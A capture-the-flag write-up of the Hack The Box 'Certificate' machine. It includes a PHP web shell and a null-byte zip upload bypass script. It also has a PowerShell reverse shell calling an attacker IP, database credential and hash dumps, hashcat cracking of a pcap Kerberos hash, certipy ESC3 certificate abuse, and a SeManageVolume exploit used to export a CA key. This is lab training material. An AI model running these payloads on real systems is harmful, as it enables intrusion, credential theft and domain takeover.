HTB | Certificate
machine - https://app.hackthebox.com/machines/Certificate
IP -10.129.238.3
NMAP
─$ nmap -sT -p- --min-rate 10000 10.129.238.3 -Pn -oA nmap_ports
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-01 00:54 IST
Nmap scan report for 10.129.238.3
Host is up (0.31s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
3268/tcp open globalcatLDAP
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49686/tcp open unknown
49688/tcp open unknown
49706/tcp open unknown
60728/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 98.69 seconds
└─$ nmap -sC -sV -p 53,80,88,135,139,445,464,636,3268,5985,9389,49666,49686,49688,49706,60728 10.129.238.3 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-01 00:56 IST
Nmap scan report for 10.129.238.3
Host is up (0.57s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-title: Did not follow redirect to <http://certificate.htb/>
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-01 03:27:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T03:28:50+00:00; +7h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T03:28:52+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
60728/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-01T03:28:14
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 115.48 seconds
SMB
The guest account is disabled, and junk accounts return STATUS_LOGON_FAILURE:
└─$ netexec smb 10.129.238.3 -u guest -p ''
SMB 10.129.238.3 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB 10.129.238.3 445 DC01 [-] certificate.htb\\guest: STATUS_ACCOUNT_DISABLED
└─$ netexec smb 10.129.238.3 -u anurag -p ''
SMB 10.129.238.3 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB 10.129.238.3 445 DC01 [-] certificate.htb\\anurag: STATUS_LOGON_FAILURE
┌──(anurag㉿anurag)-[~/htb/Certificate]
└─$ netexec smb 10.129.238.3 -u anurag -p junk
SMB 10.129.238.3 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB 10.129.238.3 445 DC01 [-] certificate.htb\\anurag:junk STATUS_LOGON_FAILURE
Port 80
└─$ whatweb -v -a 3 certificate.htb
WhatWeb report for <http://certificate.htb>
Status : 200 OK
Title : Certificate | Your portal for certification
IP : 10.129.238.3
Country : RESERVED, ZZ
Summary : Apache[2.4.58], Bootstrap, Cookies[PHPSESSID], HTML5, HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30], HttpOnly[PHPSESSID], JQuery[2.2.4], Meta-Author[colorlib], OpenSSL[3.1.3], PHP[8.0.30], Script[text/javascript], X-Powered-By[PHP/8.0.30]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.58 (from HTTP Server Header)
Google Dorks: (3)
Website : <http://httpd.apache.org/>
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : <https://getbootstrap.com/>
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 (from server string)
[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
<http://en.wikipedia.org/wiki/HTTP_cookie>
String : PHPSESSID
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 2.2.4
Website : <http://jquery.com/>
[ Meta-Author ]
This plugin retrieves the author name from the meta name
tag - info:
<http://www.webmarketingnow.com/tips/meta-tags-uncovered.html>
#author
String : colorlib
[ OpenSSL ]
The OpenSSL Project is a collaborative effort to develop a
robust, commercial-grade, full-featured, and Open Source
toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as
a full-strength general purpose cryptography library.
Version : 3.1.3
Website : <http://www.openssl.org/>
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 8.0.30
Version : 8.0.30
Google Dorks: (2)
Website : <http://www.php.net/>
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/8.0.30 (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Sun, 01 Jun 2025 03:29:17 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Set-Cookie: PHPSESSID=mkj5ujfmpukvebmbctt27acscq; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Let’ look for directory and subdirectory
└─$ dirsearch -u <http://certificate.htb/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/Certificate/reports/http_certificate.htb/__25-06-01_01-00-20.txt
Target: <http://certificate.htb/>
[01:00:20] Starting:
[01:00:54] 200 - 14KB - /about.php
[01:01:36] 500 - 638B - /cgi-bin/printenv.pl
[01:01:47] 200 - 0B - /db.php
[01:01:56] 503 - 404B - /examples/jsp/index.html
[01:01:56] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[01:01:56] 503 - 404B - /examples/
[01:01:56] 503 - 404B - /examples
[01:01:56] 503 - 404B - /examples/servlet/SnoopServlet
[01:01:56] 503 - 404B - /examples/jsp/snp/snoop.jsp
[01:01:56] 503 - 404B - /examples/servlets/index.html
[01:01:56] 503 - 404B - /examples/servlets/servlet/CookieExample
[01:01:56] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample
[01:01:56] 503 - 404B - /examples/websocket/index.xhtml
[01:01:59] 200 - 3KB - /footer.php
[01:02:03] 200 - 2KB - /header.php
[01:02:16] 200 - 9KB - /login.php
[01:02:17] 302 - 0B - /logout.php -> login.php
[01:02:44] 200 - 11KB - /register.php
[01:02:57] 301 - 343B - /static -> <http://certificate.htb/static/>
[01:02:57] 301 - 345B - /static.. -> <http://certificate.htb/static../>
[01:03:08] 302 - 0B - /upload.php -> login.php
Task Completed We can login as student
Foothold/shell
/uploads
We found “No quizz found with the given SID.” on /uploads
found upload functionality
Uploading a normal text file gives the following error
We can upload the PDF and view
When trying to upload and view a doc file, it gets downloaded
Since we can upload a zip file we can try to upload a shell.php with a null byte (maybe bypass?) inside a zip
I tried manually but no luck so we will below exploit.py
└─$ cat shell.php
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
└─$ cat exploit.py
import zipfile
import os
# Paths
zip_path = 'shell.zip'
new_zip_path = 'shell2.zip'
old_filename = 'shell.php'
new_filename = 'shell.php\\x00.pdf'
# Open the original ZIP and create a new one
with zipfile.ZipFile(zip_path, 'r') as zip_read:
with zipfile.ZipFile(new_zip_path, 'w') as zip_write:
for item in zip_read.infolist():
original_data = zip_read.read(item.filename)
# Rename the target file
if item.filename == old_filename:
item.filename = new_filename
zip_write.writestr(item, original_data)
print(f'Renamed {old_filename} to {new_filename} inside {new_zip_path}')
└─$ zip shell.zip shell.php
adding: shell.php (deflated 25%)
└─$ python3 exploit.py
Renamed shell.php to shell.php.pdf inside shell2.zip
Now we will upload the shell2.zip and visit the file with /shell.php?cmd=whoami
and we can execute cmds
Let’s try to get revshell
<http://certificate.htb/static/uploads/8ad6b1453a685cd6a629959dcfb5039d/shell.php?cmd=powershell%20-NoP%20-NonI%20-W%20Hidden%20-Command%20%22$client%20%3D%20New-Object%20System.Net.Sockets.TCPClient('10.10.16.23'%2C1234)%3B$stream%20%3D%20$client.GetStream()%3B[byte[]>]$bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile(($i%20%3D%20$stream.Read($bytes%2C%200%2C%20$bytes.Length))%20-ne%200)%7B%3B$data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString($bytes%2C0%2C%20$i)%3B$sendback%20%3D%20(iex%20$data%202%3E%261%20%7C%20Out-String%20)%3B$sendback2%20%20%3D%20$sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B$sendbyte%20%3D%20([text.encoding]::ASCII).GetBytes($sendback2)%3B$stream.Write($sendbyte%2C0%2C$sendbyte.Length)%3B$stream.Flush()%7D%22
found password.txt
PS C:\\xampp> type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
PS C:\\xampp> found webdav cred
PS C:\\xampp\\webdav> type webdav.txt
WEB-DAV f?r den gemeinsamen REMOTE-Zugriff
auf WWW-Dokumente ?ber den Apache2.
Die Module mod_dav.so und mod_dav_fs.so auskommentieren
URL: <http://localhost/webdav/>
User: wampp Password: xampp
E-Mail-Adresse bei Dreamweaver angeben.
Lokales Directory: /xampp/webdav/
PS C:\\xampp\\webdav> DB
We found db.php
PS C:\\xampp\\htdocs\\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = '<PASSWORD>'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
die('Database connection failed: ' . $e->getMessage());
}
?>
PS C:\\xampp\\htdocs\\certificate.htb> Since we know we have xampp installed let's use mysql.exe in C:\\xampp\\mysql\\bin and let's take a look at the database
PS C:\\xampp\\mysql\\bin> ./mysql.exe --host=localhost --user=certificate_webapp_user --password="cert!f!c@teDBPWD" --database=Certificate_WEBAPP_DB -e "SELECT DATABASE();"
DATABASE()
certificate_webapp_dbPS C:\\xampp\\mysql\\bin> ./mysql.exe --host=localhost --user=certificate_webapp_user --password="cert!f!c@teDBPWD" --database=Certificate_WEBAPP_DB -e "SHOW TABLES;"
Tables_in_certificate_webapp_db
course_sessions
courses
users
users_courses
PS C:\\xampp\\mysql\\bin> We found hashes for users
PS C:\\xampp\\mysql\\bin> ./mysql.exe --host=localhost --user=certificate_webapp_user --password="cert!f!c@teDBPWD" --database=Certificate_WEBAPP_DB -e "SELECT * from users;"
id first_name last_name username email password created_at role is_active
1 Lorra Armessa Lorra.AAA lorra.aaa@certificate.htb $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG 2024-12-23 12:43:10 teacher 1
6 Sara Laracrof Sara1200 sara1200@gmail.com $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK 2024-12-23 12:47:11 teacher 1
7 John Wood Johney johny009@mail.com $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq 2024-12-23 13:18:18 student 1
8 Havok Watterson havokww havokww@hotmail.com $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti 2024-12-24 09:08:04 teacher 1
9 Steven Roman stev steven@yahoo.com $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2 2024-12-24 12:05:05 student 1
10 Sara Brawn sara.b sara.b@certificate.htb $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6 2024-12-25 21:31:26 admin 1
12 test test test test@gmail.com $2y$04$5r9/BJYyYLz3UoFUmxG1.ujjbWTcSVKE6Q/UvOQTJsBEt84C6HkZW 2025-06-01 07:00:09 student 1
PS C:\\xampp\\mysql\\bin> cracking password
Let's try and crack these passwords with hashcat.
└─$ hashcat -m 3200 hashes.txt /home/anurag/stuff/rockyou.txt --username
<--SNIP-->
$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182
<--SNIP-->Shell as Sara.b
and we are in sara.b
we found a pcap file
Directory: C:\\Users\\Sara.B\\Documents\\WS-01
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/4/2024 12:44 AM 530 Description.txt
-a---- 11/4/2024 12:45 AM 296660 WS-01_PktMon.pcap
*Evil-WinRM* PS C:\\Users\\Sara.B\\Documents\\WS-01> cat Description.txt
The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!
*Evil-WinRM* PS C:\\Users\\Sara.B\\Documents\\WS-01> Shell as Lion.SK
WS-01_PktMon.pcap
On analysing protocols, we can see
Let’s look at Kerberos
We found a valid (maybe ?) packet
We can refer to this
In our case, the encryption mode (etype) is eTYPE-AES256-CTS-HMAC-SHA1-96 (18), which is the same as the vscrub
The cname and realm are in req-body: Lion.sk and CERTIFICATE.HTB, respectively.
We get the following hash
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0We will use hashcat to crack the hash
└─$ hashcat lion.hash /home/anurag/stuff/rockyou.txt
<--SNIP-->
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0:!QAZ2wsx
<--SNIP-->Let’s winrm with the cred
and we are in
found user.txt
Directory: C:\\Users\\Lion.SK\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/1/2025 2:45 AM 34 user.txtPrivilege Escalation
Bloodhound
└─$ bloodhound-python -u Lion.SK -p '!QAZ2wsx' -d Certificate.htb -ns 10.129.93.221 -c All --zip
According to the description of Domain CRA Managers.
The members of this security group are responsible for issuing and revoking multiple certificates for the domain users
ESC3
Let’s look for vulnerable templates
└─$ certipy find -u Lion.SK -p '!QAZ2wsx' -target 10.129.93.221 -text -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 18 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'Certificate-LTD-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'Certificate-LTD-CA'
[*] Checking web enrollment for CA 'Certificate-LTD-CA' @ 'DC01.certificate.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : Certificate-LTD-CA
DNS Name : DC01.certificate.htb
Certificate Subject : CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Serial Number : 75B2F4BBF31F108945147B466131BDCA
Certificate Validity Start : 2024-11-03 22:55:09+00:00
Certificate Validity End : 2034-11-03 23:05:09+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CERTIFICATE.HTB\\Administrators
Access Rights
ManageCa : CERTIFICATE.HTB\\Administrators
CERTIFICATE.HTB\\Domain Admins
CERTIFICATE.HTB\\Enterprise Admins
ManageCertificates : CERTIFICATE.HTB\\Administrators
CERTIFICATE.HTB\\Domain Admins
CERTIFICATE.HTB\\Enterprise Admins
Enroll : CERTIFICATE.HTB\\Authenticated Users
Certificate Templates
0
Template Name : Delegated-CRA
Display Name : Delegated-CRA
Certificate Authorities : Certificate-LTD-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectAltRequireEmail
SubjectRequireEmail
SubjectRequireDirectoryPath
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
AutoEnrollment
Private Key Flag : ExportableKey
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-05T19:52:09+00:00
Template Last Modified : 2024-11-05T19:52:10+00:00
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFICATE.HTB\\Domain CRA Managers
CERTIFICATE.HTB\\Domain Admins
CERTIFICATE.HTB\\Enterprise Admins
Object Control Permissions
Owner : CERTIFICATE.HTB\\Administrator
Full Control Principals : CERTIFICATE.HTB\\Domain Admins
CERTIFICATE.HTB\\Enterprise Admins
Write Owner Principals : CERTIFICATE.HTB\\Domain Admins
CERTIFICATE.HTB\\Enterprise Admins
Write Dacl Principals : CERTIFICATE.HTB\\Domain Admins
CERTIFICATE.HTB\\Enterprise Admins
Write Property Enroll : CERTIFICATE.HTB\\Domain Admins
CERTIFICATE.HTB\\Enterprise Admins
[+] User Enrollable Principals : CERTIFICATE.HTB\\Domain CRA Managers
[!] Vulnerabilities
ESC3 : Template has Certificate Request Agent EKU set.
We can refer to this for ESC3
Shell as Ryan.K
Exploitation with Certipy
The exploitation process involves obtaining an Enrollment Agent certificate and then using it to request a certificate for a privileged user, which is then used for authentication.
Step 1: Obtain an Enrollment Agent certificate. The attacker (
lion.sk@certificate.htb) enrolls for a certificate from the misconfiguredEnrollAgenttemplate.
└─$ certipy req -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' -dc-ip '10.129.93.221' -target 'dc01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'Lion.SK@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saving certificate and private key to 'lion.sk.pfx'
[*] Wrote certificate and private key to 'lion.sk.pfx'
Step 2: Use the Enrollment Agent certificate to request a certificate on behalf of the target user. The attacker uses their lion.sk.pfx (their agent certificate obtained in Step 1) to request a certificate from the SignedUser template (or another suitable agent-enrollable target template) on behalf of certificate\\ryan.k.
└─$ certipy req -u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' -dc-ip '10.129.93.221' -target 'dc01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx lion.sk.pfx -on-behalf-of 'certificate\\ryan.k'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'ryan.k@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saving certificate and private key to 'ryan.k.pfx'
[*] Wrote certificate and private key to 'ryan.k.pfx'
Step 3: Authenticate using the "on-behalf-of" certificate. The attacker uses the ryan.k.pfx (obtained in Step 2) to authenticate as the ryan.
└─$ certipy auth -pfx ryan.k.pfx -dc-ip '10.129.93.221'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'ryan.k@certificate.htb'
[*] Security Extension SID: 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Using principal: 'ryan.k@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ryan.k.ccache'
[*] Wrote credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6
Now we can winrm
And we are in as ryan
└─$ evil-winrm -i 10.129.93.221 -u ryan.k -H b1bc3d70e70f4f36b1509a65ae1a2ae6
Shell as Administrator
SeManageVolume
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Desktop>
According to Microsoft, the SeManageVolumePrivilege is used for:
This policy setting determines which users can perform volume or disk management tasks, such as defragmenting an existing volume, creating or removing volumes, and running the Disk Cleanup tool.Use caution when assigning this user right. Users with this user right can explore disks and extend files in to memory that contains other data. When the extended files are opened, the user might be able to read and modify the acquired data.
Basically this privilege gives accesses to the disks.
I found the CsEnox exploit let’s download and copy it on the box nd exploit
Now I am able to view Administrator files
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/1/2025 10:17 PM 34 root.txt
I can view, but I could not read the root.txt
Maybe a Drive-level filter is in place
Stored (”My”) certificate
We can view the "My" store (also known as the Personal certificate store) for the current user.
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> certutil -store my
my "Personal"
================ Certificate 0 ================
Archived!
Serial Number: 472cb6148184a9894f6d4d2587b1b165
Issuer: CN=certificate-DC01-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 3:30 PM
NotAfter: 11/3/2029 3:40 PM
Subject: CN=certificate-DC01-CA, DC=certificate, DC=htb
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 82ad1e0c20a332c8d6adac3e5ea243204b85d3a7
Key Container = certificate-DC01-CA
Provider = Microsoft Software Key Storage Provider
Missing stored keyset
================ Certificate 1 ================
Serial Number: 5800000002ca70ea4e42f218a6000000000002
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 8:14 PM
NotAfter: 11/3/2025 8:14 PM
Subject: CN=DC01.certificate.htb
Certificate Template Name (Certificate Type): DomainController
Non-root Certificate
Template: DomainController, Domain Controller
Cert Hash(sha1): 779a97b1d8e492b5bafebc02338845ffdff76ad2
Key Container = 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958
Provider = Microsoft RSA SChannel Cryptographic Provider
Missing stored keyset
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 3:55 PM
NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
Key Container = Certificate-LTD-CA
Provider = Microsoft Software Key Storage Provider
Missing stored keyset
CertUtil: -store command completed successfully.Here we can see Certificate-LTD-CA
That is unusual because the "My" store is intended for end-entity certificates (your own certificates that usually have a private key).
We can use this Certificate-LTD-CA to get the certificate and hash for Administrator, and for that
We need the export
pfxofCertificate-LTD-CA
we are getting error , seems like we do not have private key (or we do not have access)
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> certutil -exportpfx my "75b2f4bbf31f108945147b466131bdca" ca_exported.pfx
my "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 3:55 PM
NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
Key Container = Certificate-LTD-CA
Provider = Microsoft Software Key Storage Provider
Missing stored keyset
Enter new password for output file ca_exported.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command FAILED: 0x80090016 (-2146893802 NTE_BAD_KEYSET)
CertUtil: Keyset does not exist
So we will need ./SeManageVolumeExploit.exe to give ryan permission to read the cert
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> ./SeManageVolumeExploit.exe
Entries changed: 836
DONE
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> certutil -key "Certificate-LTD-CA"
Microsoft Strong Cryptographic Provider:
Certificate-LTD-CA
cuLoadKey: LoadKeys returned Keyset does not exist 0x80090016 (-2146893802 NTE_BAD_KEYSET) -- Certificate-LTD-CA
CertUtil: -key command completed successfully.
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> certutil -exportpfx my "75b2f4bbf31f108945147b466131bdca" ca_exported.pfx
my "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 3:55 PM
NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
Key Container = Certificate-LTD-CA
Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
Provider = Microsoft Software Key Storage Provider
Signature test passed
Enter new password for output file ca_exported.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command completed successfully.
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents> dir
Directory: C:\\Users\\Ryan.K\\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
